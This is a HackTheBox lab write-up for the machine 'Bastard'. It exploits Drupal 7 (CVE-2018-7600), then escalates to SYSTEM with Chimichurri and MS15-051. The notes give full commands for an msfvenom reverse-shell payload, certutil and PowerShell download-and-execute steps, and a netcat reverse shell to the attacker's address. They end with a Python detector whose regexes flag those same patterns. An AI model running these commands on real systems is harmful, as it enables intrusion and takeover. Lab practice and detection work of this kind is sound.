
Bastard (HackTheBox)

After the scan we see Drupal 7.

We search for it on Metasploit and Google.

We ignore Google for now and try the Metasploit modules.

We give up.

Mistakes:

  • Not trying all the Metasploit modules (the ones with a check might give you a hint even if the exploit itself doesn't work).
  • If you find something on Google and decide to try it after the Metasploit modules, go back to the Google result if the others don't work.
  • Check -h on the scripts and how to use them. You missed -c, which lets you run a command (like whoami).
  • Just do enumeration using that weird shell.

Using the Drupal remote code execution script (in home/kali/CVE-2018-7600):

python2 drupa7-CVE-2018-7600.py -c 'whoami' http://10.10.10.9/

python2 avoids some errors that python3 prints, but otherwise it makes no difference.

We get the systeminfo output for the suggester:

./windows-exploit-suggester.py --database 2024-04-08-mssb.xls --systeminfo /home/kali/Desktop/HackTheBox/Bastard/systeminfo.txt

It is vulnerable to Chimichurri.

Open an nc listener on 5555:

nc -nvlp 5555

We can send Chimichurri over and run it:

certutil -urlcache -f http://10.10.14.13:6999/Chimichurri.exe Chimichurri.exe
Chimichurri.exe 10.10.14.13 5555

We get system shell!

If it wasn't vulnerable to Chimichurri, we can make an x64 shell with msfvenom and send it over:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f exe > shell.exe

Open a server to send it over:

python3 -m http.server 80 # or 6999 or whatever
certutil -urlcache -f http://10.10.14.13/shell.exe shell.exe

# If the server is on port 80 you don't need to specify the port in the URL. The file name must match the case of the hosted file (shell.exe, as written by msfvenom above), since the Python server is case-sensitive.

Netcat:

nc -nvlp 443

443 is the LPORT we picked in the msfvenom command above.

He put his shell.exe in c:\temp and ran it through the Drupal script:

python2 drupa7-CVE-2018-7600.py -c 'c:\temp\shell.exe' http://10.10.10.9/

It pops a shell for him, but as the web user, not admin.

He uses Sherlock for privesc.

To make Sherlock run its checks automatically when loaded (like we did before with PowerUp), add this at the very end of the script:

Find-AllVulns

Send it over by hosting it:

python3 -m http.server 80

Resource: https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters

Command in the shell to download and execute it:

echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:80/Sherlock.ps1') | powershell -noprofile -

# From cmd: download and execute.

For MS15-051 he used the ZIP version from GitHub. He opened the zip in the file browser and dragged the x64 executable into the transfer folder.

Get both this exe and netcat:

certutil -urlcache -f http://10.10.14.19:6999/ms15-051x64.exe ms15.exe
certutil -urlcache -f http://10.10.14.19:6999/nc.exe nc.exe

Open an nc listener for the shell:

nc -nvlp 6998

Run ms15 with the command to execute (a reverse shell):

ms15.exe "nc.exe 10.10.14.19 6998 -e cmd.exe"
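As an added defender-side example (not part of these notes), the following Python flags the download-and-execute patterns this box relies on (certutil -urlcache fetches, IEX DownloadString piped into powershell, nc.exe -e cmd.exe) in constructed process command lines; the log lines and rule names are made up for the example.

```python
import re

# Constructed process-creation command lines mimicking what the write-up
# above runs on the target, plus two benign look-alikes; not real telemetry.
SAMPLE_CMDLINES = [
    "certutil -urlcache -f http://10.10.14.13:6999/Chimichurri.exe Chimichurri.exe",
    "certutil -urlcache -f http://10.10.14.13/shell.exe shell.exe",
    "echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:80/Sherlock.ps1') | powershell -noprofile -",
    'ms15.exe "nc.exe 10.10.14.19 6998 -e cmd.exe"',
    "certutil -hashfile C:\\Windows\\explorer.exe SHA256",   # benign certutil use
    "powershell -noprofile -File C:\\scripts\\backup.ps1",   # benign powershell use
]

# Rule names are hypothetical; the regexes target the exact patterns seen above.
RULES = [
    ("certutil_remote_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I)),
    ("powershell_iex_downloadstring",
     re.compile(r"IEX\s*\(.*DownloadString\(", re.I)),
    ("netcat_reverse_shell",
     re.compile(r"\bnc(\.exe)?\b.*\s-e\s+cmd(\.exe)?", re.I)),
]


def classify(cmdline):
    """Return the names of every rule the command line matches (empty if benign)."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(cmdlines):
    """Map each suspicious command line to its matched rules; benign lines are omitted."""
    hits = {}
    for line in cmdlines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits


if __name__ == "__main__":
    for line, rules in scan(SAMPLE_CMDLINES).items():
        print(", ".join(rules), "<-", line)
```

The certutil rule keys on -urlcache together with a URL, so ordinary certutil usage (hashing, certificate stores) does not fire.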